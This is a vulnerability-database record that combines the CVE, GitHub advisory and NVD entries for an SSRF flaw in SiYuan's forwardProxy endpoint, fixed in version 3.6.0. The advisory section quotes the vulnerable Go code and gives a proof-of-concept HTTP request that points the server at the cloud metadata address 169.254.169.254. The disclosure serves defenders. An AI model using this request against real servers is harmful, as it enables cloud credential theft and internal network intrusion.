CVE-2026-32110 (GCVE-0-2026-32110)
Vulnerability from cvelistv5 – Published: 2026-03-11 20:38 – Updated: 2026-03-12 14:01
VLAI?
Title
SiYuan has a Full-Read SSRF via /api/network/forwardProxy
Summary
SiYuan is a personal knowledge management system. Prior to 3.6.0, the /api/network/forwardProxy endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services. This vulnerability is fixed in 3.6.0.
Severity ?
8.3 (High)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| siyuan-note | siyuan |
Affected:
< 3.6.0
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-32110",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-12T14:00:57.301937Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-12T14:01:27.532Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "siyuan",
"vendor": "siyuan-note",
"versions": [
{
"status": "affected",
"version": "\u003c 3.6.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "SiYuan is a personal knowledge management system. Prior to 3.6.0, the /api/network/forwardProxy endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services. This vulnerability is fixed in 3.6.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-11T20:38:08.708Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-56cv-c5p2-j2wg",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-56cv-c5p2-j2wg"
}
],
"source": {
"advisory": "GHSA-56cv-c5p2-j2wg",
"discovery": "UNKNOWN"
},
"title": "SiYuan has a Full-Read SSRF via /api/network/forwardProxy"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-32110",
"datePublished": "2026-03-11T20:38:08.708Z",
"dateReserved": "2026-03-10T22:02:38.855Z",
"dateUpdated": "2026-03-12T14:01:27.532Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-32110\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-11T21:16:17.087\",\"lastModified\":\"2026-03-13T16:51:38.307\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"SiYuan is a personal knowledge management system. Prior to 3.6.0, the /api/network/forwardProxy endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services. This vulnerability is fixed in 3.6.0.\"},{\"lang\":\"es\",\"value\":\"SiYuan es un sistema de gesti\u00f3n de conocimiento personal. Antes de la 3.6.0, el endpoint /api/network/forwardProxy permite a usuarios autenticados realizar peticiones HTTP arbitrarias desde el servidor. El endpoint acepta una URL controlada por el usuario y realiza peticiones HTTP a ella, devolviendo el cuerpo completo de la respuesta y las cabeceras. No hay validaci\u00f3n de URL para prevenir peticiones a redes internas, localhost o servicios de metadatos en la nube. Esta vulnerabilidad est\u00e1 corregida en la 3.6.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L\",\"baseScore\":8.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.8,\"impactScore\":5.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.6.0\",\"matchCriteriaId\":\"8C3834ED-F089-4DEF-A283-7F20DC4A7C56\"}]}]}],\"references\":[{\"url\":\"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-56cv-c5p2-j2wg\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-32110\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-12T14:00:57.301937Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-12T14:01:22.842Z\"}}], \"cna\": {\"title\": \"SiYuan has a Full-Read SSRF via /api/network/forwardProxy\", \"source\": {\"advisory\": \"GHSA-56cv-c5p2-j2wg\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"siyuan-note\", \"product\": \"siyuan\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.6.0\"}]}], \"references\": [{\"url\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-56cv-c5p2-j2wg\", \"name\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-56cv-c5p2-j2wg\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"SiYuan is a personal knowledge management system. Prior to 3.6.0, the /api/network/forwardProxy endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services. This vulnerability is fixed in 3.6.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-11T20:38:08.708Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-32110\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-12T14:01:27.532Z\", \"dateReserved\": \"2026-03-10T22:02:38.855Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-11T20:38:08.708Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
GHSA-56CV-C5P2-J2WG
Vulnerability from github – Published: 2026-03-12 14:23 – Updated: 2026-03-12 14:23
VLAI?
Summary
SiYuan has a Full-Read SSRF via /api/network/forwardProxy
Details
Summary
The /api/network/forwardProxy endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services.
Affected Code
File: /kernel/api/network.go (Lines 153-317)
func forwardProxy(c *gin.Context) {
ret := gulu.Ret.NewResult()
defer c.JSON(http.StatusOK, ret)
arg, ok := util.JsonArg(c, ret)
if !ok {
return
}
destURL := arg["url"].(string)
// VULNERABILITY: Only validates URL format, not destination
if _, e := url.ParseRequestURI(destURL); nil != e {
ret.Code = -1
ret.Msg = "invalid [url]"
return
}
// ... HTTP request is made to user-controlled URL ...
resp, err := request.Send(method, destURL)
// Full response body is returned to the user
bodyData, err := io.ReadAll(resp.Body)
// ...
ret.Data = data // Contains full response body
}
PoC
- First, authenticate with your access auth code and copy the authenticated cookie.
- Now use the request below for SSRF to Access Cloud Metadata.
POST /api/network/forwardProxy HTTP/1.1
Host: <HOST>
Cookie: siyuan=<COOKIE>
Content-Length: 102
{"url":"http://169.254.169.254/metadata/v1/","method":"GET","headers":[],"payload":"","timeout":7000}'
Impact
- Internal Network Reconnaissance: Attackers can scan internal services
- Cloud Credential Theft: Potential access to cloud metadata and IAM credentials
- Data Exfiltration: Server can be used as a proxy to access internal resources
- Firewall Bypass: Requests originate from trusted internal IP
Severity ?
8.3 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.5.9"
},
"package": {
"ecosystem": "Go",
"name": "github.com/siyuan-note/siyuan/kernel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32110"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-12T14:23:14Z",
"nvd_published_at": "2026-03-11T21:16:17Z",
"severity": "HIGH"
},
"details": "### Summary\nThe `/api/network/forwardProxy` endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services.\n\n### Affected Code\nFile: `/kernel/api/network.go` (Lines `153-317`)\n```\nfunc forwardProxy(c *gin.Context) {\n ret := gulu.Ret.NewResult()\n defer c.JSON(http.StatusOK, ret)\n\n arg, ok := util.JsonArg(c, ret)\n if !ok {\n return\n }\n\n destURL := arg[\"url\"].(string)\n // VULNERABILITY: Only validates URL format, not destination\n if _, e := url.ParseRequestURI(destURL); nil != e {\n ret.Code = -1\n ret.Msg = \"invalid [url]\"\n return\n }\n\n // ... HTTP request is made to user-controlled URL ...\n resp, err := request.Send(method, destURL)\n \n // Full response body is returned to the user\n bodyData, err := io.ReadAll(resp.Body)\n // ...\n ret.Data = data // Contains full response body\n}\n```\n### PoC\n- First, authenticate with your access auth code and copy the authenticated cookie.\n- Now use the request below for SSRF to Access Cloud Metadata.\n```\nPOST /api/network/forwardProxy HTTP/1.1\nHost: \u003cHOST\u003e\nCookie: siyuan=\u003cCOOKIE\u003e\nContent-Length: 102\n\n{\"url\":\"http://169.254.169.254/metadata/v1/\",\"method\":\"GET\",\"headers\":[],\"payload\":\"\",\"timeout\":7000}\u0027\n```\n\u003cimg width=\"1230\" height=\"754\" alt=\"Screenshot 2026-03-11 at 1 23 36\u202fAM\" src=\"https://github.com/user-attachments/assets/60486dba-1ccd-4287-8073-b803854756a2\" /\u003e\n\n### Impact\n- Internal Network Reconnaissance: Attackers can scan internal services\n- Cloud Credential Theft: Potential access to cloud metadata and IAM credentials\n- Data Exfiltration: Server can be used as a proxy to access internal resources\n- Firewall Bypass: Requests originate from trusted internal IP",
"id": "GHSA-56cv-c5p2-j2wg",
"modified": "2026-03-12T14:23:14Z",
"published": "2026-03-12T14:23:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-56cv-c5p2-j2wg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32110"
},
{
"type": "PACKAGE",
"url": "https://github.com/siyuan-note/siyuan"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "SiYuan has a Full-Read SSRF via /api/network/forwardProxy"
}
FKIE_CVE-2026-32110
Vulnerability from fkie_nvd - Published: 2026-03-11 21:16 - Updated: 2026-03-13 16:51
Severity ?
Summary
SiYuan is a personal knowledge management system. Prior to 3.6.0, the /api/network/forwardProxy endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services. This vulnerability is fixed in 3.6.0.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/siyuan-note/siyuan/security/advisories/GHSA-56cv-c5p2-j2wg | Exploit, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8C3834ED-F089-4DEF-A283-7F20DC4A7C56",
"versionEndExcluding": "3.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SiYuan is a personal knowledge management system. Prior to 3.6.0, the /api/network/forwardProxy endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services. This vulnerability is fixed in 3.6.0."
},
{
"lang": "es",
"value": "SiYuan es un sistema de gesti\u00f3n de conocimiento personal. Antes de la 3.6.0, el endpoint /api/network/forwardProxy permite a usuarios autenticados realizar peticiones HTTP arbitrarias desde el servidor. El endpoint acepta una URL controlada por el usuario y realiza peticiones HTTP a ella, devolviendo el cuerpo completo de la respuesta y las cabeceras. No hay validaci\u00f3n de URL para prevenir peticiones a redes internas, localhost o servicios de metadatos en la nube. Esta vulnerabilidad est\u00e1 corregida en la 3.6.0."
}
],
"id": "CVE-2026-32110",
"lastModified": "2026-03-13T16:51:38.307",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.5,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-11T21:16:17.087",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-56cv-c5p2-j2wg"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…